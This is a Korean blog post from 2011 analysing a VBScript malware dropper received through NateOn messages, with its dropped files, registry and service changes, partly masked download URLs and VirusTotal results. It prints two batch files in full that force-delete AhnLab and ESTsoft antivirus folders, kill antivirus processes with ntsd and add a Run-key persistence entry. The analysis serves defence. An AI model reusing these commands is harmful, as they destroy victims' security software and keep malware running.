네이버 지식인 모니터링 중 어떤 질문자가 다급하게 링크를 올리며 질문을 했던 적이 있었다(SIS 공부 기간에)

네이트온 쪽지로 이상한 URL이 왔다고 알아봐 달라는 질문 이었다.

바로 URL로 들어가니 어떠한 파일을 다운받는 링크가 나왔고 다운 받으니 word.vbe라는 VB Script 파일이었다.

네이트온 쪽지로 왔으니 악성코드가 맞는 것은 100% 일 것!!

하지만, 그때는 공부중이어서 분석을 하지 못했고, 오늘에서야 분석을 하게 되었다.

분석시간이 너무 걸려 중간에 그만 뒀지만 그래도 공부는 됬을거라 생각 된다.

바이러스 토탈로 검사 해 본 결과로는 많은 AV에서 탐지하지 못하고 있다는 것이다.

바이러스 토탈에서 이 악성코드를 탐지하는 AV는 4개정도밖에 없었다.


인증샷을 보여주고 싶지만, 현재 바이러스 토탈이 무슨 문제인지 접속이 되질 않는다.. ㅠㅠ

일단 해당 악성코드를 실행하면 아래와 같은 동작을 한다.

 


[그림 1 - 실행 실패]
무언가 파일들을 실행하려 하지만 실행이 되지 않는다. 

처음에는 분석환경이 실행조건에 맞지 않아서 그런 줄 알았으나, 알고보니 파일들이 0바이트 였다...

아무런 코드도 없는 쓰레기 파일들이었다.

그리고 PE로 프로세스를 보니 ping 프로세스가 실행되어 있었다. 자세히 보니 루프백으로 ping을 10개 날리고 있었다.

그 다음으로는 아무런 동작도 하지 않는 것처럼 조용하다.... 그러나 프로그램은 아래와 같은 파일들을 생성한다.

[그림 2 - 생성 파일들]

[생성파일]


C:\WINDOWS\help\wincari.exe                            // 쓰레기 파일

C:\time.txt                                                            // 로컬컴퓨터의 날짜와 시간을 저장하는 텍스트 파일

C:\WINDOWS\Web\ver.exe                                  // 쓰레기 파일

C:\WINDOWS\system32\winfacet.exe                   // 쓰레기 파일

C:\WINDOWS\system32\Alcrm32.exe                   // 확인 불가...

C:\WINDOWS\v.bat                                              // 쓰레기 파일들을 실행시키는 등에 행위를 하는 배치파일

C:\WINDOWS\va.bat                                            // 알약AV와 V3AV를 디버깅 하도록 명령을 내리는 배치파일


아래는 위에서 생성된 v.bat 파일과 va.bat 파일의 내용이다.


[v.bat]


%systemroot%\Web\ver.exe                                   // ver.exe 실행

%systemroot%\system32\winfacet.exe                    //  winfacet.exe 실행

del "%ProgramFiles%\ESTsoft\*.*" /f /s /q               // ESTosft 하위 폴더와 파일 모두 강제 삭제


del "%ProgramFiles%\AhnLab\*.*" /f /s /q               // AhnLab 하위 폴더와 파일 모두 강제 삭제


ping 127.0.0.1 -n 10>nul                                            // 화면에 보이지 않게 nul로 출력

reg add HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v MyRun /d  %systemroot%\system32\Alcrm32.exe /f               // 레지스트리에 Alcrm32.exe 등록

date <c:\time.txt

del c:\time.txt

del %systemroot%\v.bat                                         // 모든 작업을 끝마치고 자신을 삭제


===============================================================================================================


[va.bat]


tasklist | findstr "V3LSvc.exe" && ntsd -c q -pn V3LSvc.exe                   // V3 프로세스르 찾은 뒤 디버깅

tasklist | findstr "V3LSvc.exe" && ntsd -c q -pn V3LSvc.exe

tasklist | findstr "AYServiceNT.aye" && ntsd -c q -pn AYServiceNT.aye  // 알약 프로세스를 찾은 뒤 디버깅 


해당 악성코드는 아래와 같은 레지스트리 변경작업을 실행한다.

[레지스트리 변경 항목]


HKLM\SYSTEM\CurrentControlSet\Service\SharedAccess\Start
old value : 2
New Value : 3
 

HKLM\SYSTEM\CurrentControlSet\Service\SharedAccess\Epoch\Epoch
Old Value : 32
New Value : 33
 

HKLM\SYSTEM\ControlSet001\Service\SharedAccess\Start
Old Value : 2
New Value : 3
 

HKLM\SYSTEM\ControlSet001\Service\SharedAccess\Epoch\Epoch
Old Value : 32
New Value : 33
 

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\RefCount
Old Value : 2
New Value : 1
 

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run
Old Value : 5
New Value : 7
 

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Run\ver.exe
실행결과 : ver.exe 레지스트리 등록


HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Run\MyRunC:\WINDOWS\system32\Alcrm32.exe 실행결과 : Alcrm32.exe 레지스트리 등록
 

HKLM\SOFTWARE\Microsoft\WBEM\CIMON
Old Value : 44
New Value : 47
 

HKLM\SOFTWARE\Microsoft\WBEM\CIMONHKLM\SOFTWARE\Microsoft\WBEM\CIMON\Merger Throttling Threshold

실행결과 : Merger Throttling Threshold 생성 후 value 10으로 설정
 

HKLM\SOFTWARE\Microsoft\WBEM\CIMON\Merger Release Threshold
실행결과 : Merger Release Threshold 생성 후 value 5로 설정
 

HKLM\SOFTWARE\Microsoft\WBEM\CIMON\Merger Batching Threshold 생성 후 value 131072로 설정
실행결과 : Merger Batching Threshold 생성 후 value 131072로 설정
 

HKLM\SOFTWARE\Microsoft\Rpc\UuidSequenceNumber
Old Value : -522910999
New Value : -522910998

 

HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed value 수정
실행결과 : Seed Value 수정


해당 악성코드는 아래와 같이 서비스도 수정한다.

[Drirver]
 

IP Network Address Translator(NAT) 기능 Stop                       // NAT 기능 OFF

Microsoft Kernel Wave Audio Mixer 기능 Stop



[Win32]


Application Layer Gateway Service 기능 Stop                          // OSI 7계층 서비스 게이트웨이 서비스 OFF

Windows Firewall/Internet Connection Sharing(ICS) 기능 Stop   // 방화벽, 공유 기능 OFF


이 모든 행동과 함께 인터넷이 연결되어 있다면 아래와 같이 특정 사이트에서 파일을 다운로드 한다.

[악성파일 추가 다운로드 - 아직도 다운로드가 가능하므로 주소는 모두 공개 하지 않음]

jrcrxxxx.co.kr(211.xxx.111.xxx) /%69%6D%61%67%65%73/%62%61%6E%6E%65%72/%6C%6F%67%6F%73%77%69%73%68.%6A%70%67   (/images/banner/logoswish.jpg)


www.heavexxxx.co.kr(116.xxx.158.xxx) /%73%68%6F%70/%69%6D%67/%6D%61%69%6E/%6C%6F%67%6F%30%39.%67%69%66   (/shop/img/main/logo09.gif)


jjknew.firsxxxxx.kr(121.xxx.114.xxx) /%70%61%72%74%6E%65%72/%65%73%65%6C%6C%65%72%73/%74%6D%70/%32%30%30%38%31%30%30%32%31%36%34%38%62%39%39.%67%69%66   (/partner/esellers/tmp/200810021648b99.gif)

패킷을 캡쳐해서 보면 URL 인코딩으로 되어 있는데 그것을 복호화하면 ()안에 주소가 나온다. 


하지만 내 노트북에서는 노튼이 알아서 다 처리해주어... backtrack5에서 wget으로 수동으로 다운로드 하였다.


[그림 3 - jrcrxxxx.co.kr에서 다운 받는 모습]


[그림 4 - jjknew.firsxxxxx.kr에서 다운 받는 모습]


[그림 5 - www.heavexxxxx.co.kr에서 다운 받는 모습]

이미지에서 볼수 있듯이 받는 파일들은 확장자만 이미지파일 확장자 일뿐, 실제로는 윈도우 exe 파일들이다.

어떠한 악위적인 행위를 하는지는 분석을 여기서 중단하여 모른다.(다시 이 파일들을 분석 환경으로 옴기고 등등을 하기가 너무 귀찮네요... ㅠㅠ)

한시라도 빨리 모든 백신에 치료패턴이 추가 되었으면 한다.

[+] 해당 악성코드 샘플을 얻고 싶으신 백신업체 관계자 분들은 연락주시면 바로 쏴드립니다. ^^


(2011. 12. 14 추가) - 바이러스 토탈 결과
AntivirusVersionLast UpdateResult
AhnLab-V3 2011.12.12.00 2011.12.12 -
AntiVir 7.11.19.98 2011.12.13 -
Antiy-AVL 2.0.3.7 2011.12.13 -
Avast 6.0.1289.0 2011.12.13 VBS:Agent-MC [Trj]
AVG 10.0.0.1190 2011.12.13 JS/Heur
BitDefender 7.2 2011.12.14 -
ByteHero 1.0.0.1 2011.12.07 -
CAT-QuickHeal 12.00 2011.12.13 -
ClamAV 0.97.3.0 2011.12.13 -
Commtouch 5.3.2.6 2011.12.13 -
Comodo 10947 2011.12.14 UnclassifiedMalware
DrWeb 5.0.2.03300 2011.12.13 -
Emsisoft 5.1.0.11 2011.12.13 Virus.JS.Heur!IK
eSafe 7.0.17.0 2011.12.13 -
eTrust-Vet 37.0.9622 2011.12.13 -
F-Prot 4.6.5.141 2011.12.13 -
F-Secure 9.0.16440.0 2011.12.13 -
Fortinet 4.3.388.0 2011.12.13 -
GData 22 2011.12.13 VBS:Agent-MC
Ikarus T3.1.1.109.0 2011.12.13 Virus.JS.Heur
Jiangmin 13.0.900 2011.12.13 -
K7AntiVirus 9.119.5671 2011.12.13 -
Kaspersky 9.0.0.837 2011.12.13 HEUR:Exploit.Script.Generic
McAfee 5.400.0.1158 2011.12.13 -
McAfee-GW-Edition 2010.1E 2011.12.13 -
Microsoft 1.7903 2011.12.13 -
NOD32 6709 2011.12.13 -
Norman 6.07.13 2011.12.13 -
nProtect 2011-12-13.01 2011.12.13 -
Panda 10.0.3.5 2011.12.13 -
PCTools 8.0.0.5 2011.12.14 -
Prevx 3.0 2011.12.14 -
Rising 23.88.01.02 2011.12.13 -
Sophos 4.72.0 2011.12.13 -
SUPERAntiSpyware 4.40.0.1006 2011.12.14 -
Symantec 20111.2.0.82 2011.12.14 -
TheHacker 6.7.0.1.356 2011.12.11 -
TrendMicro 9.500.0.1008 2011.12.13 -
TrendMicro-HouseCall 9.500.0.1008 2011.12.14 -
VBA32 3.12.16.4 2011.12.13 -
VIPRE 11249 2011.12.14 -
ViRobot 2011.12.13.4823 2011.12.13 -
VirusBuster 14.1.114.0 2011.12.13 -
Additional information
MD5   : 136014f57b25249e60fb4ce1dc74e1dc
SHA1  : 4efec04d655b3c641c2cd21525175549395e1e1a
SHA256: b95635c202835fffea89c28f20d15eb94770b5b041d201439ff4f9ebf7e591fa
ssdeep: 96:f7BCqrj4UWUzDqNfY9RynI7I/7qTRzPYyCtZ01TkCGfhwHYBIIJPC80u6u:TAqrGsGYvoI7E
76zVOjWYBIIPC8X
File size : 4862 bytes
First seen: 2011-12-11 08:24:20
Last seen : 2011-12-13 23:47:16
 

+ Recent posts